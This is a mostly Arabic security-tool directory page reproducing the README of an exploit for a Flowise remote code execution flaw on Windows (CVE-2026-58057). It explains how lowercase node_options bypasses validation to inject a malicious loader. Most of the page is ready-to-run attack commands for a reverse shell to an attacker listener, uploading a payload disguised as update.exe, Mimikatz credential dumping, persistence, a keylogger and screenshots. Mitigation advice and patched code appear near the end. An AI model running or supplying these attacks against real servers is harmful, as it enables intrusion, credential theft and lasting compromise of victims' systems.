Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Flowise-CVE-2026-58057-exploit — Flowise Windows RCE exploit for CVE-2026-58057. Bypasses environment variable validation via case-sensitive flaw. Uses node_options to inject arbitrary code through MCP stdio. Supports reverse shell, persistence, file upload, credential dumping. For authorized security testing only. Flowise أداة استغلال لثغرة RCE على ويندوز (CVE-2026-58057). تتجاوز التحقق من متغيرات البيئة من خلال ثغرة في حساسية حالة الأحرف. تستخدم node_options لحقن كود عشوائي عبر MCP stdio. تدعم الصدفة العكسية، الثبات، رفع الملفات، تفريغ بيانات الاعتماد. للاستخدام في اختبارات الأمان المصرح بها فقط. | Kitploit
أدوات/GitHubGitHub/cerberusmrxi/flowise-cve-2026-58057-exploit
آليات الاستمراريةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةالفريق الأحمر

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
تطوير الحمولات
GitHubcerberusmrxi/flowise-cve-2026-58057-exploit

Flowise-CVE-2026-58057-exploit

عرض المستودع
19منذ شهر واحدلم تتم المراجعة بعد

حول

Flowise Windows RCE exploit for CVE-2026-58057. Bypasses environment variable validation via case-sensitive flaw. Uses node_options to inject arbitrary code through MCP stdio. Supports reverse shell, persistence, file upload, credential dumping. For authorized security testing only. Flowise أداة استغلال لثغرة RCE على ويندوز (CVE-2026-58057). تتجاوز التحقق من متغيرات البيئة من خلال ثغرة في حساسية حالة الأحرف. تستخدم node_options لحقن كود عشوائي عبر MCP stdio. تدعم الصدفة العكسية، الثبات، رفع الملفات، تفريغ بيانات الاعتماد. للاستخدام في اختبارات الأمان المصرح بها فقط.

مشاركة

Flowise CVE-2026-58057 - استغلال تنفيذ الأوامر عن بُعد على ويندوز

Project Badge CVE Badge Author Badge Version Badge CVSS Score Badge

Affected Versions Badge
Fixed Version Badge

📋 نظرة عامة

هذا استغلال إنتاجي للثغرة CVE-2026-58057، وهي ثغرة حرجة لتنفيذ الأوامر عن بُعد في Flowise على منصات ويندوز. تنشأ الثغرة من التحقق الحساس لحالة الأحرف في متغيرات البيئة، والذي يفشل في حظر node_options بحروف صغيرة، مما يسمح للمهاجمين بتجاوز القائمة السوداء لـ NODE_OPTIONS وتنفيذ كود عشوائي من خلال تكوين MCP stdio المخصص.

يظهر الاستغلال ممارسات هندسة برمجية احترافية بهندسة معيارية، ومعالجة شاملة للأخطاء، ودعم لأنواع متعددة من الحمولات.

f1

f2

⚠️ إخلاء مسؤولية

هام: هذه الأداة مخصصة لاختبار الاختراق المأذون به، واختبارات الاختراق، والأغراض التعليمية فقط. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج. احصل دائمًا على التصريح المناسب قبل اختبار أي نظام.

🔍 التفاصيل الفنية

السبب الجذري للثغرة

root@kitploit:~
# Vulnerable Validation (Case-Sensitive )
dangerous = {"PATH", "LD_LIBRARY_PATH", "DYLD_LIBRARY_PATH", "NODE_OPTIONS"}
if key in dangerous:  # Only blocks exact uppercase match
    raise ValueError(f"Modification not allowed")

آلية الاستغلال

  1. يقوم المهاجم بمصادقة Flowise

  2. يقوم بإنشاء/تعديل عقدة MCP stdio مخصصة

  3. يحقن متغير بيئة node_options بحروف صغيرة

  4. يضع القيمة على --require malicious-loader.js

  5. يقوم Node.js بتنفيذ المحمّل عند تشغيل MCP stdio

  6. يتم تحقيق تنفيذ كود عشوائي

✨ الميزات

القدرات الأساسية

  • ✅ Shell عكسي - اتصال عكسي بجهاز المهاجم

  • ✅ Shell مقيد - فتح منفذ استماع على الهدف

  • ✅ تنفيذ أوامر - تشغيل أوامر نظام عشوائية

  • ✅ رفع ملفات - رفع ملفات إلى النظام الهدف

  • ✅ ثباتية - آليات ثباتية متعددة

  • ✅ جمع معلومات - جمع معلومات استخباراتية عن النظام

  • ✅ تفريغ بيانات الاعتماد - تكامل مع Mimikatz

  • ✅ التقاط لقطة شاشة - التقاط لقطات شاشة لسطح المكتب

  • ✅ تسجيل المفاتيح - تثبيت قدرة تسجيل المفاتيح

الميزات التقنية

  • 🔐 طرق مصادقة متعددة - مفتاح API أو اسم مستخدم/كلمة مرور

  • 🔄 منطق إعادة المحاولة التلقائي - مقاوم للمشكلات الشبكية

  • 🧹 التنظيف الذاتي - إزالة ملفات المحمّل من الهدف

  • 🌐 متعدد المنصات - يعمل على ويندوز/لينكس/macOS

  • 🎨 إخراج ملون - تحسين قابلية القراءة

  • 📊 تصحيح مطوّل - تسجيل مفصل لاستكشاف الأخطاء

📦 التثبيت

المتطلبات الأساسية

  • Python 3.6 أو أعلى

  • pip (مدير حزم بايثون)

التثبيت السريع

root@kitploit:~
# Clone repository
git clone https://github.com/CerberusMrXi/Flowise-CVE-2026-58057-exploit
cd Flowise-CVE-2026-58057-exploit

# Install dependencies
pip install -r requirements.txt

# Or minimal installation
pip install requests urllib3

التثبيت عبر Docker (اختياري)

root@kitploit:~
FROM python:3.9-alpine
RUN apk add --no-cache gcc musl-dev
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
COPY exploit.py .
ENTRYPOINT ["python3", "exploit.py"]

🚀 الاستخدام

خيارات سطر الأوامر

root@kitploit:~
python3 exploit.py --help

خيارات المصادقة

الخيارالوصفمثال
-t, --targetرابط Flowise (مطلوب)http://localhost:3000
-k, --api-keyمفتاح API Flowiseflowise_abc123...
-u, --usernameاسم المستخدمadmin
-p, --passwordكلمة المرورpassword123

خيارات الحمولة

الخيارالوصفمثال
--payloadنوع الحمولةreverse_shell
--lhostعنوان المستقبل192.168.1.100
--lportمنفذ المستقبل4444
--commandالأمر المراد تنفيذهwhoami
--local-fileالملف المراد رفعهpayload.exe
--remote-pathالمسار البعيد للحفظC:\\Temp\\update.exe

خيارات التنفيذ

الخيارالوصف
--interactiveبدء شل تفاعلي
--verboseتمكين الإخراج التفصيلي
--timeoutمهلة الطلب بالثواني
--retriesعدد محاولات إعادة المحاولة

📝 أمثلة الاستخدام

1. شل عكسي أساسي

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444

2. شل عكسي تفاعلي

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -u admin -p password \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444 \
    --interactive

3. تنفيذ أوامر

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload command_exec \
    --command "whoami"

4. رفع ملف

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload file_upload \
    --local-file /path/to/payload.exe \
    --remote-path "C:\\ProgramData\\update.exe"

5. تفريغ بيانات الاعتماد (Mimikatz)

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload mimikatz

6. تثبيت الثباتية

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload persistence

7. جمع المعلومات

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -u admin -p password \
    --payload info_gather

8. التقاط لقطة شاشة

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload screenshot

🎯 أنواع الحمولات

الحمولةالوصفالوسائط
reverse_shellاتصال عكسي بالمستقبل--lhost, --lport
bind_shellفتح منفذ استماع--lport
command_execتنفيذ أمر--command
file_uploadرفع ملف إلى الهدف--local-file, --remote-path
persistenceتثبيت الثباتيةلا يوجد
info_gatherجمع معلومات النظاملا يوجد
mimikatzتفريغ بيانات الاعتمادلا يوجد
screenshotالتقاط لقطة شاشةلا يوجد
keyloggerتثبيت مسجل المفاتيحلا يوجد

🛡️ التخفيف

ترقية Flowise

root@kitploit:~
# Upgrade to version 3.1.3 or later
npm install -g flowise@latest
# or
docker pull flowiseai/flowise:latest

الحلول البديلة

  • تقييد الوصول إلى تكوين MCP المخصص

  • تطبيق التقسيم الشبكي

  • مراقبة متغيرات البيئة المشبوهة

  • استخدام جدار حماية تطبيقات الويب (WAF)

الكود المُصلَح

root@kitploit:~
# Fixed Validation (Case-Insensitive)
dangerous = {"PATH", "LD_LIBRARY_PATH", "DYLD_LIBRARY_PATH", "NODE_OPTIONS"}
if key.upper() in dangerous:  # Case-insensitive check
    raise ValueError(f"Modification not allowed")

📊 أمثلة الإخراج

استغلال ناجح

root@kitploit:~
[14:32:15] ℹ بدء تسلسل الاستغلال...
[14:32:15] ℹ محاولة المصادقة...
[14:32:16] ✓ تمت المصادقة باستخدام مفتاح API
[14:32:16] ℹ تحضير تنفيذ حمولة reverse_shell...
[14:32:16] ℹ حقن متغير البيئة...
[14:32:17] ℹ تشغيل الحمولة...
[14:32:19] ✓ تم تنفيذ الحمولة 'reverse_shell' بنجاح!
[14:32:19] ℹ مستقبل الشل العكسي جاهز على 192.168.1.50:4444

الوضع المفصّل

root@kitploit:~
[14:32:15] 🔍 تم إنشاء جلسة باستراتيجية إعادة المحاولة
[14:32:15] 🔍 استخدام مساحة العمل الحالية: ws_123456
[14:32:16] 🔍 تم كتابة المحمّل: /tmp/loader_1234_1234567890.js
[14:32:16] 🔍 تم تحديث تكوين MCP stdio

🐛 استكشاف الأخطاء

المشكلات الشائعة

المشكلةالحل
خطأ شهادة SSLpip install --trusted-host pypi.org -r requirements.txt
رفض الإذنpip install --user -r requirements.txt
رفض الاتصالتحقق من رابط الهدف والاتصال الشبكي
فشل المصادقةتحقق من مفتاح API أو اسم المستخدم/كلمة المرور
فشل الحمولةاستخدم --verbose لتصحيح الأخطاء المفصل
إصدار Pythonتأكد من تثبيت Python 3.6+

أوامر التصحيح

root@kitploit:~
# Enable verbose logging
python3 exploit.py -t http://localhost:3000 -k API_KEY --verbose

# Test connectivity
curl -k https://localhost:3000/api/v1/version

# Check Python version
python3 --version

📁 هيكل الملفات

root@kitploit:~
flowise-CVE-2026-58057-exploit/
├── exploit.py          # البرنامج النصي الرئيسي للاستغلال
├── requirements.txt    # التبعيات الأساسية
├── README.md          # هذا التوثيق
├── LICENSE            # رخصة MIT
└── CHANGELOG.md       # سجل الإصدارات

🤝 المساهمة

  1. انسخ المستودع (Fork)

  2. أنشئ فرع الميزة (git checkout -b feature/amazing)

  3. أضف التغييرات (git commit -m 'إضافة ميزة رائعة')

  4. ادفع إلى الفرع (git push origin feature/amazing)

  5. افتح طلب سحب (Pull Request)

📜 الرخصة

هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للتفاصيل.

🏆 شكر وتقدير

  • FlowiseAI للمنتج

  • باحثو الأمن الذين اكتشفوا ثغرات مشابهة

  • مجتمع اختبار الاختراق لمنهجيات الاختبار

🔗 المراجع

  • CVE-2026-58057

  • مستودع Flowise على GitHub

  • توثيق Flowise

  • أمان متغيرات البيئة في Node.js

📧 الاتصال

المؤلف: Sudeepa Wanigarathna باحث أمني ومختبر اختراق

⭐ الدعم

إذا وجدت هذه الأداة مفيدة، يُرجى:

  • ⭐ وضع نجمة على المستودع في GitHub

  • 🔔 متابعة التحديثات

  • 📝 الإبلاغ عن مشكلات أو اقتراحات


صنع بـ ❤️ لمجتمع الأمن السيبراني

تنزيل الأداة